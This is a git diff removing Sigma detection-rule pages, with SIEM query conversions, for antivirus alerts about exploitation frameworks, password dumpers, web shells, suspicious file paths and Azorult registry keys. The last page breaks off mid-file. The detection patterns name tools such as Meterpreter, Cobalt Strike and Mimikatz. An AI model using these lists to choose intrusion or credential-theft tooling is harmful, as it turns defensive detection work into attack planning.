-| **Description**          | Detects a highly relevant Antivirus alert that reports an exploitation framework |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0011: Command and Control](https://attack.mitre.org/tactics/TA0011)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1203: Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203)</li><li>[T1219: Remote Access Software](https://attack.mitre.org/techniques/T1219)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0084_av_alert](../Data_Needed/DN0084_av_alert.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1219: Remote Access Software](../Triggers/T1219.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/](https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Antivirus Exploitation Framework Detection
-id: 238527ad-3c2c-4e4f-a1f6-92fd63adb864
-description: Detects a highly relevant Antivirus alert that reports an exploitation framework
-date: 2018/09/09
-modified: 2019/01/16
-author: Florian Roth
-references:
-    - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/
-tags:
-    - attack.execution
-    - attack.t1203
-    - attack.command_and_control
-    - attack.t1219
-logsource:
-    product: antivirus
-detection:
-    selection:
-        Signature: 
-            - "*MeteTool*"
-            - "*MPreter*"
-            - "*Meterpreter*"
-            - "*Metasploit*"
-            - "*PowerSploit*"
-            - "*CobaltSrike*"
-            - "*Swrort*"
-            - "*Rozena*"
-            - "*Backdoor.Cobalt*"
-    condition: selection
-fields:
-    - FileName
-    - User
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent | where {($_.message -match "Signature.*.*MeteTool.*" -or $_.message -match "Signature.*.*MPreter.*" -or $_.message -match "Signature.*.*Meterpreter.*" -or $_.message -match "Signature.*.*Metasploit.*" -or $_.message -match "Signature.*.*PowerSploit.*" -or $_.message -match "Signature.*.*CobaltSrike.*" -or $_.message -match "Signature.*.*Swrort.*" -or $_.message -match "Signature.*.*Rozena.*" -or $_.message -match "Signature.*.*Backdoor.Cobalt.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Signature.keyword:(*MeteTool* OR *MPreter* OR *Meterpreter* OR *Metasploit* OR *PowerSploit* OR *CobaltSrike* OR *Swrort* OR *Rozena* OR *Backdoor.Cobalt*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/238527ad-3c2c-4e4f-a1f6-92fd63adb864 <<EOF
-{
-  "metadata": {
-    "title": "Antivirus Exploitation Framework Detection",
-    "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework",
-    "tags": [
-      "attack.execution",
-      "attack.t1203",
-      "attack.command_and_control",
-      "attack.t1219"
-    ],
-    "query": "winlog.event_data.Signature.keyword:(*MeteTool* OR *MPreter* OR *Meterpreter* OR *Metasploit* OR *PowerSploit* OR *CobaltSrike* OR *Swrort* OR *Rozena* OR *Backdoor.Cobalt*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Signature.keyword:(*MeteTool* OR *MPreter* OR *Meterpreter* OR *Metasploit* OR *PowerSploit* OR *CobaltSrike* OR *Swrort* OR *Rozena* OR *Backdoor.Cobalt*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Antivirus Exploitation Framework Detection'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nFileName = {{_source.FileName}}\n    User = {{_source.User}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Signature.keyword:(*MeteTool* *MPreter* *Meterpreter* *Metasploit* *PowerSploit* *CobaltSrike* *Swrort* *Rozena* *Backdoor.Cobalt*)
-```
-
-
-### splunk
-    
-```
-(Signature="*MeteTool*" OR Signature="*MPreter*" OR Signature="*Meterpreter*" OR Signature="*Metasploit*" OR Signature="*PowerSploit*" OR Signature="*CobaltSrike*" OR Signature="*Swrort*" OR Signature="*Rozena*" OR Signature="*Backdoor.Cobalt*") | table FileName,User
-```
-
-
-### logpoint
-    
-```
-Signature IN ["*MeteTool*", "*MPreter*", "*Meterpreter*", "*Metasploit*", "*PowerSploit*", "*CobaltSrike*", "*Swrort*", "*Rozena*", "*Backdoor.Cobalt*"]
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*MeteTool.*|.*.*MPreter.*|.*.*Meterpreter.*|.*.*Metasploit.*|.*.*PowerSploit.*|.*.*CobaltSrike.*|.*.*Swrort.*|.*.*Rozena.*|.*.*Backdoor\.Cobalt.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/av_password_dumper.md b/Atomic_Threat_Coverage/Detection_Rules/av_password_dumper.md
deleted file mode 100644
index d092c68..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/av_password_dumper.md
+++ /dev/null
@@ -1,188 +0,0 @@
-| Title                    | Antivirus Password Dumper Detection       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a highly relevant Antivirus alert that reports a password dumper |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li><li>[T1558: Steal or Forge Kerberos Tickets](https://attack.mitre.org/techniques/T1558)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0084_av_alert](../Data_Needed/DN0084_av_alert.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/](https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1003.001</li><li>attack.t1003.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Antivirus Password Dumper Detection
-id: 78cc2dd2-7d20-4d32-93ff-057084c38b93
-description: Detects a highly relevant Antivirus alert that reports a password dumper
-date: 2018/09/09
-modified: 2019/10/04
-author: Florian Roth
-references:
-    - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1558
-    - attack.t1003.001
-    - attack.t1003.002
-logsource:
-    product: antivirus
-detection:
-    selection:
-        Signature:
-            - "*DumpCreds*"
-            - "*Mimikatz*"
-            - "*PWCrack*"
-            - "HTool/WCE"
-            - "*PSWtool*"
-            - "*PWDump*"
-            - "*SecurityTool*"
-            - "*PShlSpy*"
-    condition: selection
-fields:
-    - FileName
-    - User
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent | where {($_.message -match "Signature.*.*DumpCreds.*" -or $_.message -match "Signature.*.*Mimikatz.*" -or $_.message -match "Signature.*.*PWCrack.*" -or $_.message -match "HTool/WCE" -or $_.message -match "Signature.*.*PSWtool.*" -or $_.message -match "Signature.*.*PWDump.*" -or $_.message -match "Signature.*.*SecurityTool.*" -or $_.message -match "Signature.*.*PShlSpy.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Signature.keyword:(*DumpCreds* OR *Mimikatz* OR *PWCrack* OR HTool\/WCE OR *PSWtool* OR *PWDump* OR *SecurityTool* OR *PShlSpy*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/78cc2dd2-7d20-4d32-93ff-057084c38b93 <<EOF
-{
-  "metadata": {
-    "title": "Antivirus Password Dumper Detection",
-    "description": "Detects a highly relevant Antivirus alert that reports a password dumper",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1558",
-      "attack.t1003.001",
-      "attack.t1003.002"
-    ],
-    "query": "winlog.event_data.Signature.keyword:(*DumpCreds* OR *Mimikatz* OR *PWCrack* OR HTool\\/WCE OR *PSWtool* OR *PWDump* OR *SecurityTool* OR *PShlSpy*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Signature.keyword:(*DumpCreds* OR *Mimikatz* OR *PWCrack* OR HTool\\/WCE OR *PSWtool* OR *PWDump* OR *SecurityTool* OR *PShlSpy*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Antivirus Password Dumper Detection'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nFileName = {{_source.FileName}}\n    User = {{_source.User}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Signature.keyword:(*DumpCreds* *Mimikatz* *PWCrack* HTool\/WCE *PSWtool* *PWDump* *SecurityTool* *PShlSpy*)
-```
-
-
-### splunk
-    
-```
-(Signature="*DumpCreds*" OR Signature="*Mimikatz*" OR Signature="*PWCrack*" OR Signature="HTool/WCE" OR Signature="*PSWtool*" OR Signature="*PWDump*" OR Signature="*SecurityTool*" OR Signature="*PShlSpy*") | table FileName,User
-```
-
-
-### logpoint
-    
-```
-Signature IN ["*DumpCreds*", "*Mimikatz*", "*PWCrack*", "HTool/WCE", "*PSWtool*", "*PWDump*", "*SecurityTool*", "*PShlSpy*"]
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*DumpCreds.*|.*.*Mimikatz.*|.*.*PWCrack.*|.*HTool/WCE|.*.*PSWtool.*|.*.*PWDump.*|.*.*SecurityTool.*|.*.*PShlSpy.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/av_relevant_files.md b/Atomic_Threat_Coverage/Detection_Rules/av_relevant_files.md
deleted file mode 100644
index a5b744e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/av_relevant_files.md
+++ /dev/null
@@ -1,193 +0,0 @@
-| Title                    | Antivirus Relevant File Paths Alerts       |
-|:-------------------------|:------------------|
-| **Description**          | Detects an Antivirus alert in a highly relevant file path or with a relevant file name |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0084_av_alert](../Data_Needed/DN0084_av_alert.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/](https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Antivirus Relevant File Paths Alerts
-id: c9a88268-0047-4824-ba6e-4d81ce0b907c
-description: Detects an Antivirus alert in a highly relevant file path or with a relevant file name
-date: 2018/09/09
-modified: 2019/10/04
-author: Florian Roth
-references:
-    - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/
-logsource:
-    product: antivirus
-detection:
-    selection:
-        FileName:
-            - 'C:\Windows\Temp\\*'
-            - 'C:\Temp\\*'
-            - '*\\Client\\*'
-            - 'C:\PerfLogs\\*'
-            - 'C:\Users\Public\\*'
-            - 'C:\Users\Default\\*'
-            - '*.ps1'
-            - '*.vbs'
-            - '*.bat'
-            - '*.chm'
-            - '*.xml'
-            - '*.txt'
-            - '*.jsp'
-            - '*.jspx'
-            - '*.asp'
-            - '*.aspx'
-            - '*.php'
-            - '*.war'
-            - '*.hta'
-            - '*.lnk'
-            - '*.scf'
-            - '*.sct'
-            - '*.vbe'
-            - '*.wsf'
-            - '*.wsh'
-    condition: selection
-fields:
-    - Signature
-    - User
-falsepositives:
-    - Unlikely
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent | where {($_.message -match "FileName.*C:\\Windows\\Temp\\.*" -or $_.message -match "FileName.*C:\\Temp\\.*" -or $_.message -match "FileName.*.*\\Client\\.*" -or $_.message -match "FileName.*C:\\PerfLogs\\.*" -or $_.message -match "FileName.*C:\\Users\\Public\\.*" -or $_.message -match "FileName.*C:\\Users\\Default\\.*" -or $_.message -match "FileName.*.*.ps1" -or $_.message -match "FileName.*.*.vbs" -or $_.message -match "FileName.*.*.bat" -or $_.message -match "FileName.*.*.chm" -or $_.message -match "FileName.*.*.xml" -or $_.message -match "FileName.*.*.txt" -or $_.message -match "FileName.*.*.jsp" -or $_.message -match "FileName.*.*.jspx" -or $_.message -match "FileName.*.*.asp" -or $_.message -match "FileName.*.*.aspx" -or $_.message -match "FileName.*.*.php" -or $_.message -match "FileName.*.*.war" -or $_.message -match "FileName.*.*.hta" -or $_.message -match "FileName.*.*.lnk" -or $_.message -match "FileName.*.*.scf" -or $_.message -match "FileName.*.*.sct" -or $_.message -match "FileName.*.*.vbe" -or $_.message -match "FileName.*.*.wsf" -or $_.message -match "FileName.*.*.wsh") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.FileName.keyword:(C\:\\Windows\\Temp\\* OR C\:\\Temp\\* OR *\\Client\\* OR C\:\\PerfLogs\\* OR C\:\\Users\\Public\\* OR C\:\\Users\\Default\\* OR *.ps1 OR *.vbs OR *.bat OR *.chm OR *.xml OR *.txt OR *.jsp OR *.jspx OR *.asp OR *.aspx OR *.php OR *.war OR *.hta OR *.lnk OR *.scf OR *.sct OR *.vbe OR *.wsf OR *.wsh)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c9a88268-0047-4824-ba6e-4d81ce0b907c <<EOF
-{
-  "metadata": {
-    "title": "Antivirus Relevant File Paths Alerts",
-    "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name",
-    "tags": "",
-    "query": "winlog.event_data.FileName.keyword:(C\\:\\\\Windows\\\\Temp\\\\* OR C\\:\\\\Temp\\\\* OR *\\\\Client\\\\* OR C\\:\\\\PerfLogs\\\\* OR C\\:\\\\Users\\\\Public\\\\* OR C\\:\\\\Users\\\\Default\\\\* OR *.ps1 OR *.vbs OR *.bat OR *.chm OR *.xml OR *.txt OR *.jsp OR *.jspx OR *.asp OR *.aspx OR *.php OR *.war OR *.hta OR *.lnk OR *.scf OR *.sct OR *.vbe OR *.wsf OR *.wsh)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.FileName.keyword:(C\\:\\\\Windows\\\\Temp\\\\* OR C\\:\\\\Temp\\\\* OR *\\\\Client\\\\* OR C\\:\\\\PerfLogs\\\\* OR C\\:\\\\Users\\\\Public\\\\* OR C\\:\\\\Users\\\\Default\\\\* OR *.ps1 OR *.vbs OR *.bat OR *.chm OR *.xml OR *.txt OR *.jsp OR *.jspx OR *.asp OR *.aspx OR *.php OR *.war OR *.hta OR *.lnk OR *.scf OR *.sct OR *.vbe OR *.wsf OR *.wsh)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Antivirus Relevant File Paths Alerts'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nSignature = {{_source.Signature}}\n     User = {{_source.User}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-FileName.keyword:(C\:\\Windows\\Temp\\* C\:\\Temp\\* *\\Client\\* C\:\\PerfLogs\\* C\:\\Users\\Public\\* C\:\\Users\\Default\\* *.ps1 *.vbs *.bat *.chm *.xml *.txt *.jsp *.jspx *.asp *.aspx *.php *.war *.hta *.lnk *.scf *.sct *.vbe *.wsf *.wsh)
-```
-
-
-### splunk
-    
-```
-(FileName="C:\\Windows\\Temp\\*" OR FileName="C:\\Temp\\*" OR FileName="*\\Client\\*" OR FileName="C:\\PerfLogs\\*" OR FileName="C:\\Users\\Public\\*" OR FileName="C:\\Users\\Default\\*" OR FileName="*.ps1" OR FileName="*.vbs" OR FileName="*.bat" OR FileName="*.chm" OR FileName="*.xml" OR FileName="*.txt" OR FileName="*.jsp" OR FileName="*.jspx" OR FileName="*.asp" OR FileName="*.aspx" OR FileName="*.php" OR FileName="*.war" OR FileName="*.hta" OR FileName="*.lnk" OR FileName="*.scf" OR FileName="*.sct" OR FileName="*.vbe" OR FileName="*.wsf" OR FileName="*.wsh") | table Signature,User
-```
-
-
-### logpoint
-    
-```
-FileName IN ["C:\\Windows\\Temp\\*", "C:\\Temp\\*", "*\\Client\\*", "C:\\PerfLogs\\*", "C:\\Users\\Public\\*", "C:\\Users\\Default\\*", "*.ps1", "*.vbs", "*.bat", "*.chm", "*.xml", "*.txt", "*.jsp", "*.jspx", "*.asp", "*.aspx", "*.php", "*.war", "*.hta", "*.lnk", "*.scf", "*.sct", "*.vbe", "*.wsf", "*.wsh"]
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*C:\Windows\Temp\\.*|.*C:\Temp\\.*|.*.*\\Client\\.*|.*C:\PerfLogs\\.*|.*C:\Users\Public\\.*|.*C:\Users\Default\\.*|.*.*\.ps1|.*.*\.vbs|.*.*\.bat|.*.*\.chm|.*.*\.xml|.*.*\.txt|.*.*\.jsp|.*.*\.jspx|.*.*\.asp|.*.*\.aspx|.*.*\.php|.*.*\.war|.*.*\.hta|.*.*\.lnk|.*.*\.scf|.*.*\.sct|.*.*\.vbe|.*.*\.wsf|.*.*\.wsh)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/av_webshell.md b/Atomic_Threat_Coverage/Detection_Rules/av_webshell.md
deleted file mode 100644
index 1a06b97..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/av_webshell.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | Antivirus Web Shell Detection       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a highly relevant Antivirus alert that reports a web shell |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1100: Web Shell](https://attack.mitre.org/techniques/T1100)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0084_av_alert](../Data_Needed/DN0084_av_alert.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/](https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1505.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Antivirus Web Shell Detection
-id: fdf135a2-9241-4f96-a114-bb404948f736
-description: Detects a highly relevant Antivirus alert that reports a web shell
-date: 2018/09/09
-modified: 2019/10/04
-author: Florian Roth
-references:
-    - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/
-tags:
-    - attack.persistence
-    - attack.t1100
-    - attack.t1505.003
-logsource:
-    product: antivirus
-detection:
-    selection:
-        Signature:
-            - "PHP/Backdoor*"
-            - "JSP/Backdoor*"
-            - "ASP/Backdoor*"
-            - "Backdoor.PHP*"
-            - "Backdoor.JSP*"
-            - "Backdoor.ASP*"
-            - "*Webshell*"
-    condition: selection
-fields:
-    - FileName
-    - User
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent | where {($_.message -match "Signature.*PHP/Backdoor.*" -or $_.message -match "Signature.*JSP/Backdoor.*" -or $_.message -match "Signature.*ASP/Backdoor.*" -or $_.message -match "Signature.*Backdoor.PHP.*" -or $_.message -match "Signature.*Backdoor.JSP.*" -or $_.message -match "Signature.*Backdoor.ASP.*" -or $_.message -match "Signature.*.*Webshell.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Signature.keyword:(PHP\/Backdoor* OR JSP\/Backdoor* OR ASP\/Backdoor* OR Backdoor.PHP* OR Backdoor.JSP* OR Backdoor.ASP* OR *Webshell*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/fdf135a2-9241-4f96-a114-bb404948f736 <<EOF
-{
-  "metadata": {
-    "title": "Antivirus Web Shell Detection",
-    "description": "Detects a highly relevant Antivirus alert that reports a web shell",
-    "tags": [
-      "attack.persistence",
-      "attack.t1100",
-      "attack.t1505.003"
-    ],
-    "query": "winlog.event_data.Signature.keyword:(PHP\\/Backdoor* OR JSP\\/Backdoor* OR ASP\\/Backdoor* OR Backdoor.PHP* OR Backdoor.JSP* OR Backdoor.ASP* OR *Webshell*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Signature.keyword:(PHP\\/Backdoor* OR JSP\\/Backdoor* OR ASP\\/Backdoor* OR Backdoor.PHP* OR Backdoor.JSP* OR Backdoor.ASP* OR *Webshell*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Antivirus Web Shell Detection'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nFileName = {{_source.FileName}}\n    User = {{_source.User}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Signature.keyword:(PHP\/Backdoor* JSP\/Backdoor* ASP\/Backdoor* Backdoor.PHP* Backdoor.JSP* Backdoor.ASP* *Webshell*)
-```
-
-
-### splunk
-    
-```
-(Signature="PHP/Backdoor*" OR Signature="JSP/Backdoor*" OR Signature="ASP/Backdoor*" OR Signature="Backdoor.PHP*" OR Signature="Backdoor.JSP*" OR Signature="Backdoor.ASP*" OR Signature="*Webshell*") | table FileName,User
-```
-
-
-### logpoint
-    
-```
-Signature IN ["PHP/Backdoor*", "JSP/Backdoor*", "ASP/Backdoor*", "Backdoor.PHP*", "Backdoor.JSP*", "Backdoor.ASP*", "*Webshell*"]
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*PHP/Backdoor.*|.*JSP/Backdoor.*|.*ASP/Backdoor.*|.*Backdoor\.PHP.*|.*Backdoor\.JSP.*|.*Backdoor\.ASP.*|.*.*Webshell.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/mal_azorult_reg.md b/Atomic_Threat_Coverage/Detection_Rules/mal_azorult_reg.md
deleted file mode 100644
index a4135a8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/mal_azorult_reg.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Registy Entries For Azorult Malware       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the presence of a registry key created during Azorult execution |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1112: Modify Registry](https://attack.mitre.org/techniques/T1112)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1112: Modify Registry](../Triggers/T1112.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a)</li></ul>  |
-| **Author**               | Trent Liffick |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Registy Entries For Azorult Malware
-id: f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7
-description: Detects the presence of a registry key created during Azorult execution
-status: experimental
-references:
-  - https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a
-author: Trent Liffick
-date: 2020/05/08
-tags:
-  - attack.execution
-  - attack.t1112
-logsource:
-  product: windows
-  service: sysmon
-detection:
-  selection:
-    EventID:
-      - 12
-      - 13
-    TargetObject:
-      - '*SYSTEM\\*\services\localNETService'
-  condition: selection
-fields:
-  - Image
-  - TargetObject
-  - TargetDetails
-falsepositives:
-  - unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "12" -or $_.ID -eq "13") -and ($_.message -match "TargetObject.*.*SYSTEM\\.*\\services\\localNETService")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:("12" OR "13") AND winlog.event_data.TargetObject.keyword:(*SYSTEM\\*\\services\\localNETService))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7 <<EOF
-{
-  "metadata": {
-    "title": "Registy Entries For Azorult Malware",
-    "description": "Detects the presence of a registry key created during Azorult execution",
-    "tags": [
-      "attack.execution",
-      "attack.t1112"
-    ],
